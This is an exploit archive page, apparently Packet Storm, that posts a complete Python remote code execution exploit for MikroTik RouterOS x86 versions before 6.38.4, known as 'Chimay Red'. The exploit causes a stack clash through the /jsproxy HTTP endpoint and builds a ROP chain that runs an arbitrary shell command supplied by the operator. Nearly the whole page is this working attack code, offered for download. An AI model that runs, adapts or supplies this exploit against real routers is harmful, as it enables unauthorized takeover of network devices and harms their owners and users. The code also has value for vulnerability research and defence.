Twenty Year Anniversary

MikroTik RouterOS Chimay Red Stack Clash Remote Code Execution

MikroTik RouterOS Chimay Red Stack Clash Remote Code Execution
Posted Mar 13, 2018
Authored by Lorenzo Santina

MikroTik RouterOS versions prior to 6.38.4 (x86) Chimay Red stack clash remote code execution exploit.

tags | exploit, remote, x86, code execution
MD5 | fa75bb56a5777825b631d7238931d52b

MikroTik RouterOS Chimay Red Stack Clash Remote Code Execution

Change Mirror Download
#!/usr/bin/env python2

# Mikrotik Chimay Red Stack Clash Exploit by wsxarcher (based on BigNerd95 POC)

# tested on RouterOS 6.38.4 (x86)

# ASLR enabled on libs only
# DEP enabled

import socket, time, sys, struct
from pwn import *
import ropgadget

AST_STACKSIZE = 0x800000 # default stack size per thread (8 MB)
ROS_STACKSIZE = 0x20000 # newer version of ROS have a different stack size per thread (128 KB)
SKIP_SPACE = 0x1000 # 4 KB of "safe" space for the stack of thread 2
ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!

ALIGN_SIZE = 0x10 # alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
ADDRESS_SIZE = 0x4 # we need to overwrite a return address to start the ROP chain

context(arch="i386", os="linux", log_level="WARNING")

gadgets = dict()
plt = dict()
strings = dict()
system_chunks = []
cmd_chunks = []

def makeHeader(num):
return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")

def makeSocket(ip, port):
s = socket.socket()
try:
s.connect((ip, port))
except:
print("Error connecting to socket")
sys.exit(-1)
print("Connected")
time.sleep(0.5)
return s

def socketSend(s, data):
try:
s.send(data)
except:
print("Error sending data")
sys.exit(-1)
print("Sent")
time.sleep(0.5)

def ropCall(function_address, *arguments):

payload = struct.pack('<L', function_address)

num_arg = len(arguments)

if num_arg > 0:

if num_arg == 1:
ret_gadget = gadgets['p']
elif num_arg == 2:
ret_gadget = gadgets['pp']
elif num_arg == 3:
ret_gadget = gadgets['ppp']
elif num_arg == 4:
ret_gadget = gadgets['pppp']
else:
raise

payload += struct.pack('<L', ret_gadget)

for arg in arguments:
payload += struct.pack('<L', arg)

return payload

# pwntools filters out JOP gadgets
# https://github.com/Gallopsled/pwntools/blob/5d537a6189be5131e63144e20556302606c5895e/pwnlib/rop/rop.py#L1074
def ropSearchJmp(elf, instruction):
oldargv = sys.argv
sys.argv = ['ropgadget', '--binary', elf.path, '--only', 'jmp']
args = ropgadget.args.Args().getArgs()
core = ropgadget.core.Core(args)
core.do_binary(elf.path)
core.do_load(0)

sys.argv = oldargv

for gadget in core._Core__gadgets:
address = gadget['vaddr'] - elf.load_addr + elf.address
if gadget['gadget'] == instruction:
return address

raise

def loadOffsets(binary, shellCmd):
elf = ELF(binary)
rop = ROP(elf)

if len([_ for _ in elf.search("pthread_attr_setstacksize")]) > 0:
global AST_STACKSIZE
AST_STACKSIZE = ROS_STACKSIZE

# www PLT symbols
plt["strncpy"] = elf.plt['strncpy']
plt["dlsym"] = elf.plt['dlsym']

# Gadgets to clean the stack from arguments
gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address
gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address
gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address
gadgets['p'] = rop.search(regs=["ebp"]).address

# Gadget to jump on the result of dlsym (address of system)
gadgets['jeax'] = ropSearchJmp(elf, "jmp eax")

system_chunks.extend(searchStringChunksLazy(elf, "system\x00"))
cmd_chunks.extend(searchStringChunksLazy(elf, shellCmd + "\x00"))

# get the address of the first writable segment to store strings
writable_address = elf.writable_segments[0].header.p_paddr

strings['system'] = writable_address
strings['cmd'] = writable_address + 0xf

def generateStrncpyChain(dst, chunks):
chain = ""
offset = 0
for (address, length) in chunks:
chain += ropCall(plt["strncpy"], dst + offset, address, length)
offset += length

return chain

# only search for single chars
def searchStringChunksLazy(elf, string):
chunks = []
for b in string:
res = [_ for _ in elf.search(b)]
if len(res) > 0:
chunks.append((res[0], 1))
else:
raise

if len(string) != len(chunks):
raise

return chunks

# [bugged, some problem with dots, not used]
# search chunks of string
def searchStringChunks(elf, string):
chunks = []
total = len(string)

if string == "":
raise

looking = string

while string != "":
results = [_ for _ in elf.search(looking)]

if len(results) > 0:
chunks.append((results[0], len(looking)))
string = string[len(looking):]
looking = string
else: # search failed
looking = looking[:-1] # search again removing last char

check_length = 0
for (address, length) in chunks:
check_length = check_length + length

if check_length == total:
return chunks
else:
raise

def buildROP(binary, shellCmd):
loadOffsets(binary, shellCmd)

# ROP chain
exploit = generateStrncpyChain(strings['system'], system_chunks) # w_segment = "system"
exploit += generateStrncpyChain(strings['cmd'], cmd_chunks) # w_segment = "bash cmd"
exploit += ropCall(plt["dlsym"], 0, strings['system']) # dlsym(0, "system"), eax = libc.system
exploit += ropCall(gadgets['jeax'], strings['cmd']) # system("cmd")

# The server is automatically restarted after 3 secs, so we make it crash with a random address
exploit += struct.pack('<L', 0x13371337)

return exploit

def stackClash(ip, port, ropChain):

print("Opening 2 sockets")

# 1) Start 2 threads
# open 2 socket so 2 threads are created
s1 = makeSocket(ip, port) # socket 1, thread A
s2 = makeSocket(ip, port) # socket 2, thread B

print("Stack clash...")

# 2) Stack Clash
# 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A)
socketSend(s1, makeHeader(AST_STACKSIZE + SKIP_SPACE + ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)

# 2.2) send some bytes as post data to socket 1 (thread A)
socketSend(s1, b'A'*(SKIP_SPACE - ALIGN_SIZE - ADDRESS_SIZE)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved

# 2.3) send post header with Content-Length to reserve ROP space to socket 2 (thread B)
socketSend(s2, makeHeader(ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned

print("Sending payload")

# 3) Send ROP chain
socketSend(s1, ropChain) # thread A writes the ROP chain in the stack of thread B

print("Starting exploit")

# 4) Start ROP chain
s2.close() # close socket 2 to return from the function of thread B and start ROP chain

print("Done!")

def crash(ip, port):
print("Crash...")
s = makeSocket(ip, port)
socketSend(s, makeHeader(-1))
socketSend(s, b'A' * 0x1000)
s.close()
time.sleep(2.5) # www takes up to 3 seconds to restart

if __name__ == "__main__":
if len(sys.argv) == 5:
ip = sys.argv[1]
port = int(sys.argv[2])
binary = sys.argv[3]
shellCmd = sys.argv[4]

print("Building ROP chain...")
ropChain = buildROP(binary, shellCmd)
print("The ROP chain is " + str(len(ropChain)) + " bytes long (" + str(ROP_SPACE) + " bytes available)")

crash(ip, port) # should make stack clash more reliable
stackClash(ip, port, ropChain)
else:
print("Usage: ./StackClashROPsystem.py IP PORT binary shellcommand")

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close